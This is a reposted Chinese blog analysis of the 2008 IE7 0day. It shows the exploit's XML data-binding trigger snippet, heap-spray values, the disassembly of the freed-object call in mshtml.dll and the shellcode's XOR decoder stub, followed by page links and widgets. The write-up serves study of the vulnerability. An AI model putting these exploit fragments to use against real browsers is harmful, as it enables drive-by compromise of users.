IE7 0day漏洞分析

最新推荐文章于 2024-04-14 11:46:37 发布
最新推荐文章于 2024-04-14 11:46:37 发布
阅读量350 收藏
点赞数
文章标签: ie byte image javascript c xml

转载:天天向上网 http://www.52harry.com/network/2011-12-13/824.html

昨天不小心看到knownsec安全团队发的文章,所以就想看看到底是怎么造成的。

这两天这个IE7的0day挺热的,我也凑凑热闹,说实话,不怎么会javascript,所以分析也挺费劲的,
但是大体知道是个怎么回事触发这个漏洞的了

0day代码片断
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://&#114;&#2570;&#114;.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');

关键触发是由于这个Image SRC的字段的数据造成的
http://&#114;&#2570;&#114;.book.com
mshtml.dll会对这个SRC作解析

&#114把十进制的114转成0x0072
&#2570把十进制的2570转成0x0a0a
刚好它们拼在一起就是一个可利用的堆地址
0x0a0a0072,通过heap spray,分配大量的内存
可使shellcode填充到这个地址空间去,所以我们可以修改这个值来构造我们
的地址,知道下面的
用意了吧,呵呵
var retVal=unescape("%u0a0a%u0a0a");
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;

它是怎么进入到0x0a0a0072这个地址的了,由于
重用了一个释放了的对象的造成可以执行我们自已构造的数据,具体代码如下
mshtml.dll CXfer::TransferFromSrc(void) 
.text:461E3D18 public: long __thiscall CXfer::TransferFromSrc(void) proc near
.text:461E3D18                                         ; CODE XREF: CXfer::ColumnsChanged(ulong,ulong * const)+33 p
.text:461E3D18                                         ; CDataBindingEvents::TransferFromSrc(CElement *,long)+24 p ...
.text:461E3D18
.text:461E3D18 pvarg           = VARIANTARG ptr -18h
.text:461E3D18 var_8           = dword ptr -8
.text:461E3D18 var_4           = dword ptr -4
.text:461E3D18
.text:461E3D18                 mov     edi, edi
.text:461E3D1A                 push    ebp
.text:461E3D1B                 mov     ebp, esp
.text:461E3D1D                 sub     esp, 18h
.text:461E3D20                 push    ebx
.text:461E3D21                 push    esi
.text:461E3D22                 mov     esi, ecx
.text:461E3D24                 xor     ebx, ebx
.text:461E3D26                 test    byte ptr [esi+1Ch], 9
.text:461E3D2A                 jnz     loc_461E3E2E

.text:461E3D30                 mov     eax, [esi] //eax==0x0a0a0072
.text:461E3D32                 cmp     eax, ebx
.text:461E3D34                 jz      loc_461E3E29
.text:461E3D3A                 cmp     [esi+4], ebx
.text:461E3D3D                 jz      loc_461E3E29
.text:461E3D43                 cmp     [esi+8], ebx
.text:461E3D46                 jz      loc_461E3E29
.text:461E3D4C                 mov     ecx, [eax] //可能是eax==0x0a0a0a0a
.text:461E3D4E                 push    edi
.text:461E3D4F                 push    eax
.text:461E3D50                 call    dword ptr [ecx+84h] //call 0x0a0a0aae
.text:461E3D56                 mov     eax, [esi+1Ch]
.text:461E3D59                 mov     edi, eax
.text:461E3D5B                 shr     edi, 1

call 0x0a0a0aae会执行如下指令,一直执行直到执行到shellcode处

0A2BF9B6    0A0A            or      cl, byte ptr [edx]
0A2BF9B8    0A0A            or      cl, byte ptr [edx]
0A2BF9BA    0A0A            or      cl, byte ptr [edx]
0A2BF9BC    0A0A            or      cl, byte ptr [edx]
0A2BF9BE    0A0A            or      cl, byte ptr [edx]
0A2BF9C0    0A0A            or      cl, byte ptr [edx]
0A2BF9C2    0A0A            or      cl, byte ptr [edx]
0A2BF9C4    0A0A            or      cl, byte ptr [edx]
0A2BF9C6    0A0A            or      cl, byte ptr [edx]
0A2BF9C8    0A0A            or      cl, byte ptr [edx]
0A2BF9CA    0A0A            or      cl, byte ptr [edx]
0A2BF9CC    0A0A            or      cl, byte ptr [edx]
0A2BF9CE    0A0A            or      cl, byte ptr [edx]
0A2BF9D0    0A0A            or      cl, byte ptr [edx]
0A2BF9D2    0A0A            or      cl, byte ptr [edx]
0A2BF9D4    0A0A            or      cl, byte ptr [edx]
0A2BF9D6    0A0A            or      cl, byte ptr [edx]
0A2BF9D8    0A0A            or      cl, byte ptr [edx]
0A2BF9DA    0A0A            or      cl, byte ptr [edx]
0A2BF9DC    0A0A            or      cl, byte ptr [edx]
0A2BF9DE    0A0A            or      cl, byte ptr [edx]
0A2BF9E0    0A0A            or      cl, byte ptr [edx]
0A2BF9E2    0A0A            or      cl, byte ptr [edx]
0A2BF9E4    0A0A            or      cl, byte ptr [edx]
0A2BF9E6    0A0A            or      cl, byte ptr [edx]
0A2BF9E8    0A0A            or      cl, byte ptr [edx]

0A2BF9EA    90              nop   //shellcode
0A2BF9EB    90              nop
0A2BF9EC    25 00750090     and     eax, 90007500
0A2BF9F1    90              nop
0A2BF9F2    90              nop
0A2BF9F3    90              nop
0A2BF9F4    D9E1            fabs
0A2BF9F6    D93424          fstenv (28-byte) ptr [esp]
0A2BF9F9    58              pop     eax
0A2BF9FA    58              pop     eax
0A2BF9FB    58              pop     eax
0A2BF9FC    58              pop     eax
0A2BF9FD    33DB            xor     ebx, ebx
0A2BF9FF    B3 1C           mov     bl, 1C
0A2BFA01    03C3            add     eax, ebx
0A2BFA03    31C9            xor     ecx, ecx
0A2BFA05    66:81E9 65FA    sub     cx, 0FA65
0A2BFA0A    8030 21         xor     byte ptr [eax], 21
0A2BFA0D    40              inc     eax
0A2BFA0E ^ E2 FA           loopd   short 0A2BFA0A
神经质的盛宴
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最新IE7漏洞0day分析.php
12-12
最新IE7漏洞0day分析.php 最新IE7漏洞0day分析.php
IE7漏洞蔓延 所有IE浏览器均存在高危漏洞
weixin_33860553的博客
10-08 118
据国外媒体报道,微软公司发布公告证实,12月9日曝出的IE7高危漏洞,同样存在于IE5.01、IE6、IE7等浏览器。微软同时暗示,微软oledb32.dll文件中包含该漏洞,建议用户暂时关闭.dll功能。oledb32.dll是微软数据库访问(Microsoft Data Access)组件的一部分。 除此之外,甚至在未正式发布的IE8 Beta2浏览器中,也存在该高危漏洞,用户在 Wind...
IE7 0DAY漏洞所用shellcode的分析
lionzl的专栏
07-07 842
IE7 0DAY漏洞所用shellcode的分析 2008/12/14 22:29 | 鬼仔 | 技术文章 | 占个座先 标 题: 【原创】IE7 0DAY漏洞所用shellcode的分析 作 者:轩辕小聪 时 间: 2008-12-11,20:37 链 接: http://bbs.pediy.com/showthread.php?t=78502 作者主页: http
IE7 0Day 漏洞分析及防御原理(图)
clubsondy的专栏
12-18 772
 IE7 0Day 漏洞分析   自2008年12月10日曝出IE7 0DAY漏洞以来,网页挂马网站迅速增多,受影响用户人数已达百万,而且有继续增多的趋势,一些地下组织开始公然贩卖漏洞服务,对该漏洞微软至今还未公布相关补丁,据了解,微软IE 7 0day漏洞是一个基于IE7浏览器内核的漏洞,所有基于IE7内核的浏览器如傲游、腾讯TT都会成为攻击对象,而且一些内置了IE内核的杀毒软件、应用软件如Of
最新IE 0day漏洞Metasploit生成方法.txt
03-18
最新IE 0day漏洞Metasploit生成方法.txt
逃逸IE浏览器沙箱-在野0Day漏洞利用复现
10-13
逃逸IE浏览器沙箱_在野0Day漏洞利用复现
Office 0day漏洞
09-26
微软office0day漏洞存在于微软办公软件office网页组件的OCW10和OCW11文件中,可影响office办公套件的多个版本。当相关版本office用户使用IE6、IE7或IE内核的浏览器访问恶意网页时,随即触发漏洞跳转至黑客指定的...
IE7 0day漏洞
李新阳
12-12 159
IE70day漏洞被微软证实,但安全补丁还没有发布。现在的建议是:不要使用IE7。 要 我说啊,不如直接删除了IE7算了,一了百了。
传说20W的IE7.0的0Day代码
weixin_34191734的博客
12-09 134
从网上收集到的一个0day传说20w &lt;script language="javascript"&gt; if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank"); function sleep(milliseconds) { var start=new Date()...
js禁用所有的input
Rockandrollman的博客
04-11 322
要在JavaScript中禁用所有的input元素,您可以使用document.querySelectorAll方法来选择所有的input元素,然后使用一个循环来为它们设置disabled属性。这段代码将会禁用页面上所有的input元素。
Vue.js组件精讲 第2章 基础:Vue.js组件的三个API:prop、event、slot
此博客内容主要是小可日常工作中的一些问题解决的记录整理而成
04-09 865
现在我们给组件加一个点击事件,目前有两种写法,我们先看自定义事件 event(部分代码省略):
【300套】基于Springboot+Vue的Java实战开发项目(附源码+演示视频+LW)
2301_77929200的博客
04-12 1345
🧡今天给大家分享300+的Java毕业设计,基于Springboot+vue框架,这些项目都经过精心挑选,涵盖了不同的实战主题和用例,可做毕业设计和课程设计参考。✍️除了源码,对于大部分项目实现的功能都有相应的介绍,并且配有演示视频,方便大家根据自己的需要择优下载学习。💂另外如有定制需求或者想要相对应的论文参考,文末可以十我VX联系。🤝后续还会持续更新,欢迎关注!
js的filter函数
最新发布
xiaohua0708day的博客
04-14 187
这个函数接收数组中的每个元素作为参数,并检查该元素是否是偶数。如果是偶数,函数返回。是一个数组方法,它创建一个新数组,其包含通过提供的函数实现的测试的所有元素。函数遍历数组中的每个元素,并只将那些使测试函数返回。在这个箭头函数版本中,我们直接返回了表达式。在上面的代码中,我们传递了一个匿名函数给。方法就会将该元素包含在新数组中。,则该元素会被包含在新数组中。在JavaScript中,的元素包含在新数组中。
TS基础2-常用类型
qq_40147756的博客
04-12 290
ts 中常用类型和举例说明。
vue3 手写tab栏的滑动效果
Michelle209的博客
04-12 197
在tab上定位一个slider,每次点击的时候获取当前active的tab-item序号,从而获取到其相对于父元素的水平距离,然后把这个距离更新到slider的left属性上。
echarts tooltip提示框显示不全
在职可交流前端开发,包括:web端、uniapp等,欢迎指教。
04-11 505
一个可由多个柱形图叠加而成的图表,命名为someHoverLine(可自定义)。 下面罗列了移动端和web端的封装组件代码; 展示了vue2、uniapp、vue3的不同封装和使用案列。
【vue】v-bind动态属性绑定
m0_63070489的博客
04-11 385
【vue】v-bind动态属性绑定
创建组件的10条准则
m0_52617844的博客
04-11 1035
安恒明御审计0day漏洞
08-15
根据所提供的引用内容,我找不到与"安恒明御审计0day漏洞"相关的信息。请提供更多的背景信息或者详细描述问题,以便我能够更好地回答你的问题。<span class="em">1</span><span class="em">2</span><span class="em...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值